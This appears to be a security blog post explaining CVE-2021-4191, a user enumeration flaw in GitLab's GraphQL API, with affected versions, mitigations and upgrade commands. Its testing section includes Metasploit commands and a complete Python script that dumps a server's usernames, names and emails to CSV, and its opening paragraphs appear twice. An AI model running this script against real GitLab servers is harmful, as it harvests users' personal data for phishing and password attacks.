• Home
  • |
  • Blog
  • |
  • How To Fix CVE-2021-4191- An User Enumeration Vulnerability In GitLab
How to Fix CVE-2021-4191- An User Enumeration Vulnerability in GitLab

Rapid 7, a well-known security firm, disclosed a vulnerability in GitLab. The vulnerability tracked as CVE-2021-4191 with a base score of 5.3 in the Common Vulnerability Scoring System is a medium severity vulnerability that exposes information such as usernames, names, and email addresses to adversaries. It is important for all the GitLab users to know about the CVE-2021-4191 vulnerability and fix it up as soon as they can. In this post, let’s see the summary, versions affected, and finally how to fix CVE-2021-4191- An User Enumeration Vulnerability in GitLab. Let’s start from the summary of the CVE-2021-4191 vulnerability.

Summary Of CVE-2021-4191- An User Enumeration Vulnerability In GitLab:

The vulnerability actually exists in the GraphQL API of GitLab. It is due to a missing authentication check when executing certain GitLab GraphQL API queries. The successful exploitation of the vulnerability would allow an attacker to read the personal information such as usernames, names, and email IDs of the GitLab users. Although the vulnerability has less impact on the functionality, it may give a way to perform password attacks such as bruit force, password spraying, credential stuffing, and information leak attacks on GitLab. These types of attacks are considered the first phase of attacks before conducting a large phishing campaign that leads to further escalation or exploitation.

GitLab Versions Affected By The CVE-2021-4191 vulnerability:

Research says that this User Enumeration Vulnerability in GitLab affects all the versions of GitLab Community Edition (CE) starting from 13.0 and Enterprise Edition (EE) starting from 14.4 to 14.8.

How To Test Your GitLab Is Vulnerable To The CVE-2021-4191 Vulnerability?

There is a Metasploit module is available out in the market. From this, we can say that there are possibilities that the flaw has been under exploitation in the wild.

Run these commands on the Kali Linux or Parrot OS on which you will have the Metasploit framework is preloaded. You may need to install the Metasploit framework and load the exploit if not. Run these commands to test your GitLab is vulnerable to the CVE-2021-4191 vulnerability.

Rapid 7, a well-known security firm, disclosed a vulnerability in GitLab. The vulnerability tracked as CVE-2021-4191 with a base score of 5.3 in the Common Vulnerability Scoring System is a medium severity vulnerability that exposes information such as usernames, names, and email addresses to adversaries. It is important for all the GitLab users to know about the CVE-2021-4191 vulnerability and fix it up as soon as they can. In this post, let’s see the summary, versions affected, and finally how to fix CVE-2021-4191- An User Enumeration Vulnerability in GitLab. Let’s start from the summary of the CVE-2021-4191 vulnerability.

Summary Of CVE-2021-4191:

The vulnerability actually exists in the GraphQL API of GitLab. It is due to a missing authentication check when executing certain GitLab GraphQL API queries. The successful exploitation of the vulnerability would allow an attacker to read the personal information such as usernames, names, and email IDs of the GitLab users. Although the vulnerability has less impact on the functionality, it may give a way to perform password attacks such as bruit force, password spraying, credential stuffing, and information leak attacks on GitLab. These types of attacks are considered the first phase of attacks before conducting a large phishing campaign that leads to further escalation or exploitation.

GitLab Versions Affected By The CVE-2021-4191 Vulnerability:

Research says that this User Enumeration Vulnerability in GitLab affects all the versions of GitLab Community Edition (CE) starting from 13.0 and Enterprise Edition (EE) starting from 14.4 to 14.8.

How To Test Your GitLab Is Vulnerable To The CVE-2021-4191 Vulnerability?

There is a Metasploit module is available out in the market. From this, we can say that there are possibilities that the flaw has been under exploitation in the wild. Run these commands on the Kali Linux or Parrot OS on which you will have the Metasploit framework is preloaded. You may need to install the Metasploit framework and load the exploit if not. Run these commands to test your GitLab is vulnerable to the CVE-2021-4191 vulnerability.

# msfconsole

# use auxiliary/scanner/http/gitlab_graphql_user_enum

# set RHOST <ip>

# set SSL false

# set PORT 80

# run
PoC of CVE-2021-4191 by Jacob Baines

Alternatively, you can do this just by running a Python script. This method doesn’t need the Metasploit framework. This Python script will print a CSV containing the discovered IDs, usernames, names, email addresses, and if the user is a bot.

###
# Dumps GitLab's user base to CSV form.
#
# Requires GraphqlClient: pip install python-graphql-client
###
from python_graphql_client import GraphqlClient
import json
import sys
import argparse

top_parser = argparse.ArgumentParser(description='A tool for dumping a GitLab userbase via GraphQL')
top_parser.add_argument('--rurl', action="store", dest="rurl", required=True, help="The remote URL to send the requests to")
args = top_parser.parse_args()

client = GraphqlClient(endpoint=args.rurl)

# first starts at 1
first = 1

query_header = """query
{
    users"""
query_paging_info = ""
query_payload = """
    {
        pageInfo {
          hasNextPage
          hasPreviousPage
          endCursor
          startCursor
        }
        nodes {
          id
          bot
          username
          email
          publicEmail
          name
          webUrl
          webPath
          avatarUrl
          state
          location
          status {
            emoji
            availability
            message
            messageHtml
          }
          userPermissions {
            createSnippet
          }
          groupCount
          groups {
            nodes{
              id
              name
              fullName
              fullPath
            }
          }
          starredProjects {
            nodes{
              name
              path
              fullPath
            }
          }
          projectMemberships {
            nodes {
              id
              createdAt
            }
          }
          namespace{
            id
            name
            path
            fullName
            fullPath
            lfsEnabled
            visibility
            requestAccessEnabled
            sharedRunnersSetting
          }
          callouts {
            nodes{
              featureName
              dismissedAt
            }
          }
        }
      }
    }
"""

more_data = True

print("id,username,name,publicEmail,bot")
while more_data == True:
    query = query_header + query_paging_info + query_payload
    json_data = client.execute(query=query)

    if "errors" in json_data:
        print("Received error in response. Exiting. ")
        print(json.dumps(json_data))
        sys.exit(0)

    for user in json_data["data"]["users"]["nodes"]:
        print(user["id"] + "," +  user["username"] + "," + user["name"] + "," + user["publicEmail"] + "," + str(user["bot"]))

    if json_data["data"]["users"]["pageInfo"]["hasNextPage"] == True:
        query_paging_info = "(after:\"" + json_data["data"]["users"]["pageInfo"]["startCursor"] + "\")"
    else:
        more_data = False

Command to run the script:

$ python3 gitlab_enum.py --rurl http://10.0.0.6/api/graphql

Note: These exploits were created only for educational/research purposes only. Use at your own risk.

How To Fix CVE-2021-4191- An User Enumeration Vulnerability In GitLab?

  1. Since GitLab patched the CVE-2021-4191 vulnerability in v14.8.2, v14.7.4, and v14.6.5, we recommend updating your GitLab to any of the versions that will fix the CVE-2021-4191 vulnerability.
  2. The best practice is to restrict GitLab access from the public network. Since attacks are prone to the GitLab exposed to the internet, we recommend not to host the GitLab directly to the internet. Deploy it behind the VPN gateways. or publish them on a secure platform like Citrix.
  3. Disabling public profiles is also good general mitigation against unauthenticated information gathering as it prevents anyone who isn’t logged in from seeing user profiles. To Disable public profiles:
    1. Sign in to GitLab as an Administrator.
    2. On the top bar, select Menu > Admin.
    3. On the left sidebar, select Settings > General.
    4. Expand the Visibility and access controls.
    5. Then check the box next to “Public” under the Restricted visibility levels section

How to upgrade GitLab to the latest version?

GitLab upgradation process depends on the installation methods followed in your organization. GitLab officially supports four different ways of upgradation process:

1. Linux packages (Omnibus GitLab)
2. Source installations
3. Docker installations
4. Kubernetes (Helm) installations

  1. Create back up before the upgrade

    It is highly recommended to have a full up-to-date backup before you begin.

  2. Add GitLab official repositories

    1. gitlab/gitlab-ee: The full GitLab package contains all the Community Edition features plus the Enterprise Edition ones.
    2. gitlab/gitlab-ce: A stripped down package that contains only the Community Edition features.
    3. gitlab/unstable: Release candidates and other unstable versions.
    4. gitlab/nightly-builds: Nightly builds.
    5. gitlab/raspberry-pi2: Official Community Edition releases built for Raspberry Pi packages.

    You can run this command to update the latest repositories if you have GitLab installed on your server.

    $ sudo apt update

  3. Upgrade GitLab to the latest version using the official repositories

    To upgrade to the latest GitLab version:

    # Ubuntu/Debian
    $ sudo apt upgrade gitlab-ee

    # RHEL/CentOS 6 and 7
    $ sudo yum upgrade gitlab-ee

    # RHEL/CentOS 8
    $ sudo dnf upgrade gitlab-ee

    # SUSE
    $ sudo zypper upgrade gitlab-ee

    Note: For the GitLab Community Edition, replace gitlab-ee with gitlab-ce.

  4. Upgrade GitLab to a specific version

    Use these commands with a version number to upgrade GitLab to a specific version.

    # Ubuntu/Debian
    $ sudo apt install gitlab-ee=<version>

    # RHEL/CentOS 6 and 7
    $ sudo yum install gitlab-ee-<version>

    # RHEL/CentOS 8
    $ sudo dnf install gitlab-ee-<version>

    # SUSE
    $ sudo zypper install gitlab-ee=<version>

  5. Upgrade GitLab using a manually-downloaded package

    After the package is downloaded, install it by using one of the following commands and replacing <package_name> with the package name you downloaded:

    # Debian/Ubuntu
    $ dpkg -i <package_name>

    # CentOS/RHEL
    $ rpm -Uvh <package_name>

    # SUSE
    $ zypper install <package_name>

We hope this post will help you know How to Fix CVE-2021-4191- An User Enumeration Vulnerability in GitLab. Thanks for reading this threat post. Please share this post and help to secure the digital world. Visit our social media page on FacebookLinkedInTwitterTelegramTumblr, & Medium and subscribe to receive updates like this. 

About the author

Arun KL

Hi All, I am Arun KL, an IT Security Professional. Founder of “thesecmaster.com”. Enthusiast, Security Blogger, Technical Writer, Editor, Author at TheSecMaster. To know more about me. Follow me on LinkedIn

Leave a Reply

Your email address will not be published. Required fields are marked

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Learn Something New with Free Email subscription

Email is also one of the ways to be in touch with us. Our free subscription plan offers you to receive post updates straight to your inbox.